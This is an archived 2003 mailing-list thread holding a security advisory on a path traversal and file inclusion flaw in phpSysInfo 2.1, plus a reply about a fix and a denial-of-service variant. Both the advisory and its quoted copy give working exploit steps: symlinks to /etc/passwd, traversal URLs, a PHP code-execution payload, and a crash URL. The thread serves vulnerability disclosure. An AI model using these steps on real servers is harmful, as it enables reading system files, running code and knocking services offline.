PDA

Bekijk Volledige Versie : Unauthorized reading files on phpSysInfo



Albert Puigsech Galicia
25/04/03, 19:05
/-----------------------------------------------------------------------------\
| 7 A 6 9 - A d v C: 007
|-----------------------------------------------------------------------------|
|
| [ Unauthorized reading files on phpSysInfo ]
|
\-----------------------------------------------------------------------------/
| 01/04/2003 |


Data.
-----

+ Type: To gain visiblity.

+ Software: phpSysInfo.

+ Verions: until 2.1 (current version).

+ Exploit: Yes (but only local).

+ Autor: Albert Puigsech Galicia

+ Contact: ripe@7a69ezine.org



Information.
------------

PhpSysInfo is a litle PHP script destined to show system information.
It shows data like CPU or memory usage, Disk usage, PCI, ethernet, and IDE
information, etc. Visit project website on http://phpsysinfo.sourceforge.net
for more info.


Description.
------------

PhpSysInfo uses a template system using 'template' variable, and a
languaje system using 'lng' variable. These variables are used to complete
a file path without check if it contains the '..' especial directory, allowing
to read any file on system as webserver user.


Exploiting.
-----------

The exploit of this vulnerability require write access on a local
directory where webserver can read files.

On template case, phpSysInfo cheks only if template exists. To do
it only check if 'templates/$template' exists.


---/ index.php /---

if (!((isset($template) && file_exists("templates/$template")) || $template ==
'xml')) {
// default template we should use if we don't get a argument.
$template = 'classic';
}

---/ index.php /---


Exactly the same on languaje selection system.


---/ index.php /---

if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
$lng = 'en';
// see if the browser knows the right languange.
if(isset($HTTP_ACCEPT_LANGUAGE)) {
$plng = split(',', $HTTP_ACCEPT_LANGUAGE);
if(count($plng) > 0) {
while(list($k,$v) = each($plng)) {
$k = split(';', $v, 1);
$k = split('-', $k[0]);
if(file_exists('./includes/lang/' . $k[0] . '.php')) {
$lng = $k[0];
break;
}
}
}
}
}

---/ index.php /---

'template, variable will be used to use the file
'./templates/$template/form.tpl' and './templates/$template/box.tpl'
for template stuff, so is necesary ti create the symlinks to read
any file allowed to webserver.


local ~$ ln -s /etc/passwd /tmp/form.tpl
local ~$ ln -s /etc/passwd /tmp/box.tpl

http://vulnerable/index.php?template=../../../../tmp


'lng' variable is used on this peace of code:

---/ index.php /---

require('./includes/lang/' . $lng . '.php'); // get our language include

---/ index.php /---


It allow us, as the same way as 'template' to read a file on
the system.


local ~$ ln -s /etc/passwd /tmp/p.php

http://vulnerable/index.php?lng=../../../../tmp/p


But it also allow to execute arbitrary PHP code, creating the php
file firts.


local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php

http://vulnerable/index.php?lng=../../../../tmp/p


The use of '.' php function to concat strings remote exploit for
this vulnerable php script, because we cant use %00 to end the string.


Patch.
------

There is not an oficial patch, but is easy to code it adding some
regex on the code to filter '..' content on 'template' and 'lng' variables.



--
>====================================
> Albert Puigsech Galicia (7a69)
>
> http://ripe.7a69ezine.org
>====================================

Wolter Kamphuis
26/04/03, 01:20
Hi,

In bug report #670222 I described the same problem and how to use it to
DoS the host. Calling "index.php?lng=../../index" creates a run-a-way
recursive loop, creating a huge load and finally crashing the
apache process. This can easily be used to DoS a webserver.
http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015

On 19 january my fix for this problem has been incorporated in the cvs
repository. This also fixes the problems described in Albert Puigsech
Galicia's report.
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57

phpSysInfo 2.1 is vulnerable, the cvs versions after 19 january are not.

mzzl
Wolter Kamphuis



Albert Puigsech Galicia wrote:
> /-----------------------------------------------------------------------------\
> | 7 A 6 9 - A d v C: 007
> |-----------------------------------------------------------------------------|
> |
> | [ Unauthorized reading files on phpSysInfo ]
> |
> \-----------------------------------------------------------------------------/
> | 01/04/2003 |
>
>
> Data.
> -----
>
> + Type: To gain visiblity.
>
> + Software: phpSysInfo.
>
> + Verions: until 2.1 (current version).
>
> + Exploit: Yes (but only local).
>
> + Autor: Albert Puigsech Galicia
>
> + Contact: ripe@7a69ezine.org
>
>
>
> Information.
> ------------
>
> PhpSysInfo is a litle PHP script destined to show system information.
> It shows data like CPU or memory usage, Disk usage, PCI, ethernet, and IDE
> information, etc. Visit project website on http://phpsysinfo.sourceforge.net
> for more info.
>
>
> Description.
> ------------
>
> PhpSysInfo uses a template system using 'template' variable, and a
> languaje system using 'lng' variable. These variables are used to complete
> a file path without check if it contains the '..' especial directory, allowing
> to read any file on system as webserver user.
>
>
> Exploiting.
> -----------
>
> The exploit of this vulnerability require write access on a local
> directory where webserver can read files.
>
> On template case, phpSysInfo cheks only if template exists. To do
> it only check if 'templates/$template' exists.
>
>
> ---/ index.php /---
>
> if (!((isset($template) && file_exists("templates/$template")) || $template ==
> 'xml')) {
> // default template we should use if we don't get a argument.
> $template = 'classic';
> }
>
> ---/ index.php /---
>
>
> Exactly the same on languaje selection system.
>
>
> ---/ index.php /---
>
> if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
> $lng = 'en';
> // see if the browser knows the right languange.
> if(isset($HTTP_ACCEPT_LANGUAGE)) {
> $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
> if(count($plng) > 0) {
> while(list($k,$v) = each($plng)) {
> $k = split(';', $v, 1);
> $k = split('-', $k[0]);
> if(file_exists('./includes/lang/' . $k[0] . '.php')) {
> $lng = $k[0];
> break;
> }
> }
> }
> }
> }
>
> ---/ index.php /---
>
> 'template, variable will be used to use the file
> './templates/$template/form.tpl' and './templates/$template/box.tpl'
> for template stuff, so is necesary ti create the symlinks to read
> any file allowed to webserver.
>
>
> local ~$ ln -s /etc/passwd /tmp/form.tpl
> local ~$ ln -s /etc/passwd /tmp/box.tpl
>
> http://vulnerable/index.php?template=../../../../tmp
>
>
> 'lng' variable is used on this peace of code:
>
> ---/ index.php /---
>
> require('./includes/lang/' . $lng . '.php'); // get our language include
>
> ---/ index.php /---
>
>
> It allow us, as the same way as 'template' to read a file on
> the system.
>
>
> local ~$ ln -s /etc/passwd /tmp/p.php
>
> http://vulnerable/index.php?lng=../../../../tmp/p
>
>
> But it also allow to execute arbitrary PHP code, creating the php
> file firts.
>
>
> local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php
>
> http://vulnerable/index.php?lng=../../../../tmp/p
>
>
> The use of '.' php function to concat strings remote exploit for
> this vulnerable php script, because we cant use %00 to end the string.
>
>
> Patch.
> ------
>
> There is not an oficial patch, but is easy to code it adding some
> regex on the code to filter '..' content on 'template' and 'lng' variables.
>
>
>
> --
>
>>====================================
>>Albert Puigsech Galicia (7a69)
>>
>>http://ripe.7a69ezine.org
>>====================================
>
>